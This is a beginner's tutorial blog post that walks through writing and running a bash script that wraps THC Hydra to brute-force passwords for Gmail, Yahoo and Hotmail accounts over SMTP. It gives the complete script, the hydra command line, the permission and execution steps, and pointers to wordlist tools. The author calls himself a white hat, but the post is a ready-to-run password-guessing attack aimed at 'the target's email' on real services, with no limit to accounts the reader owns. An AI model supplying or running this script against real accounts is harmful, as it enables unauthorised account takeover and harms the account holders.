How to Brute-Force Email Using a Simple Bash Script (Ft. THC Hydra)

Jun 14, 2015 06:10 PM
Jun 14, 2015 06:20 PM
635698767691622626.jpg

Hi, my name is Alan, and I am not a script kiddy brat from Xbox Live asking you how to boot someone offline for being mean to me. I am an amateur white hat hacker hoping to learn and teach and this is my first tutorial.

THC Hydra is very prominent online brute-force tool and has been featured in Null-Byte quite a lot. It is dictionary based, as you will have to provide a wordlist with possible passwords. You can read the README here: https://github.com/vanhauser-thc/thc-hydra

Today ,we will be focusing on brute forcing email, or more specifically, SMTP, also known as the Simple Mail Transfer Protocol. It is your standard protocol for sending electronic mail.

Let's get started!

Step 1: Open Up Kali!

Of course, we will be using Kali Linux. I use mine on VMware Workstation, but it won't really matter what you use.

Let's open up Leafpad, or your text editing program of your choice.

635698753517871381.jpg

Step 2: Bash Time!

We're going to write a little bit of script, so that we can save some time instead of going through the hassle of actually typing out parameters.

On Leafpad, type:

#! /bin/bash

echo Simple Email Cracking Script in bash

echo Written By: Alan Cao

echo NOTE: Make sure you have wordlists!

echo Let us Begin:

echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:

read smtp

echo Enter Email Address:

read email

echo Provide Directory of Wordlist for Passwords:

read wordlist

hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp

And after you got it, save it as anything you want, but with .sh at the end. Make sure it is in the root directory. Not on your desktop, but in /root.

635698763607248841.jpg

Now, I am going to explain how the script works.

#! /bin/bash simply means that everything is in bash.

echo simply means to tell the computer to say something. For example, echo Hello World means to tell the computer to output Hello World.

read is asking for user input. this will then store your input into a variable. read email would mean for you to enter something, and it will be stored into the email.

hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp is the THC Hydra command which will help brute-force the email address. As you may tell, there are some parameters with a $. This is the variable with stored values you previously input in the read command.

Step 3: Permissions

We're not done yet! The file you have saved (in root, right?) only has read and write permissions. This means you cannot execute it.

Let's open up Terminal. Type in

chmod a+x yourscript.sh (ofc replace yourscript with the name you actually gave to the bash file)

635698766013186350.jpg

Step 4: Execute!

Now we can finally use it!

In terminal, let's type

./yourscript.sh

635698767691622626.jpg

It's working!

The script is self-explanatory. Type in the SMTP service of the target's email, where smtp.gmail.com is Gmail. After that, you provide the gmail account, such as johndoe@gmail.com and give a wordlist directory, which you can find some default ones in the /usr/share/wordlists directory, or you can create your own with Crunch or CUPP. https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-4-creating-custom-wordlist-with-crunch-0156817/

Thanks for reading, and please provide some feedback. Ofc, this is my first How-to...

Comments

No Comments Exist

Be the first, drop a comment!